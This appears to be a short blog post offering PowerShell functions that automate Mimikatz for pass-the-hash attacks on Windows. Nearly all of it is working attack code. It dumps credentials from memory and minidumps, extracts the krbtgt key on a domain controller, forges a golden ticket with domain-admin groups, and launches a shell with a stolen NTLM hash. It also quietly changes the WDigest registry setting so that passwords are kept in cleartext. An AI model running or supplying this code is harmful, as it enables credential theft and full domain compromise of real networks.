Pass the Hash

one of the main security issues with windows is pass the hash. I added some functions to the Mimikatz Powershell script that can be found here.

 

The functions that make the usage of mimikatz more easy. Just add these functions to the end of the mimikatz script and launch the script. Then the functions are in memory and available functions will be shown.

Function Global:invoke-mimiDom {
    if (Test-path „$ScriptPath\mimi_dom.log“) {
    $MimiUser =“didi44″
    write-host $scriptpath -foregroundcolor green
    $global:mimidata = Get-Content „$ScriptPath\mimi_dom.log“
    Foreach ($line in $mimidata){
    if ($line -match „aes256_hmac“) {$global:aes = $($line.split(„:“)[1]).trim()}
    if ($line -match „Domain :“) {$global:domSid = $($line.split(„/“)[1]).trim()}
    if ($line -match „Default Salt :“) {$global:domain = $($($line.split(„:“)[1]).trim()).replace(„krbtgt“,““)}

}
    $FullCMD= „kerberos::golden /domain:“ + $domain  + “ /sid:“ + $domsid + “ /aes256:“ + $aes + “ /user:“ + $mimiUser + “ /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi“
    Write-host $fullcmd
    invoke-mimikatz -command „privilege::debug kerberos::purge `“$fullcmd`“ `“kerberos::ptt forged.kirbi`“ misc::cmd“
    } ELSE {
        Write-host „there is no mimi_dom.log, please run first invoke-mimiexportdom  on a domain controller“ -foregroundcolor red
    }

}

Function Global:invoke-mimiStd {
$global:mimi_tmp  = Invoke-Mimikatz
$mimi_TMP | Out-File „$ScriptPath\mimi.log“
$global:mimi = Get-Content „$ScriptPath\mimi.log“
foreach ($line in $mimi){
        $number++
        if ($line -match „\* Username : Administrator“){
            $Global:mimiUsername1 = $($line.split(„:“)[1]).trim()
            $Global:mimiDom1 = $($mimi[$number].split(„:“)[1]).trim()
            $Global:mimiHash1 = $($mimi[$number+1].split(„:“)[1]).trim()
            break
        }
    }
Write-host „$mimiusername1 $mimiDom1 $mimihash1“
}

FUNCTION Global:invoke-MimiExportDom {
if (!(test-path „$scriptpath\mimi_dom.log“)){
    $global:mimi_dom_tmp = Invoke-mimikatz -command „privilege::debug `“lsadump::lsa /inject /name:krbtgt`““
    $global:mimi_dom_tmp | Out-File „$scriptpath\mimi_dom.log“
    $global:mimi_dom = get-content „$ScriptPath\mimi_dom.log“
}
}

FUNCTION Global:Invoke-mimiDMP {
$dmps = get-childitem „$scriptpath\*.dmp“
foreach ($dmp in $dmps) {
    Write-host „analysing $dmp“ -foregroundcolor green
    $global:mimi = invoke-mimikatz -command „privilege::debug `“sekurlsa::minidump $dmp`“ sekurlsa::logonpasswords“
    }
    Write-host $mimi
}

FUNCTION Global:Invoke-mimicmd {
    If ($mimiUsername1 -lt 1){
        Write-host „please run first invoke-mimiSTD“ -foregroundcolor red}
    ELSE {
        $command =  „privilege::debug `“sekurlsa::pth /user:“ + $mimiUsername1 + “ /domain:“+ $mimiDom1 + “ /ntlm:“ + $mimiHash1 +“ /run:cmd`““
        write-host „$command“
        $global:mimi = invoke-mimikatz -command $command
    }
}

 

#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

If ($( get-itemproperty HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest\).uselogoncredential -ne 1){
    reg add HKLM\system\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t Reg_DWORD /d 1
    Write-host „changed security provider – to see passeword in cleartext logoff and log on again“ -ForegroundColor Yellow
    }

Write-host „the following functions are available:“
write-host „invoke-mimiStd“ -foregroundcolor green
write-host „invoke-mimiExportDom“ -foregroundcolor green
write-host „invoke-mimiDom“ -foregroundcolor green
write-host „invoke-mimiDmp“ -foregroundcolor green
write-host „invoke-mimiCMD“ -foregroundcolor green

Pass the Hash

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.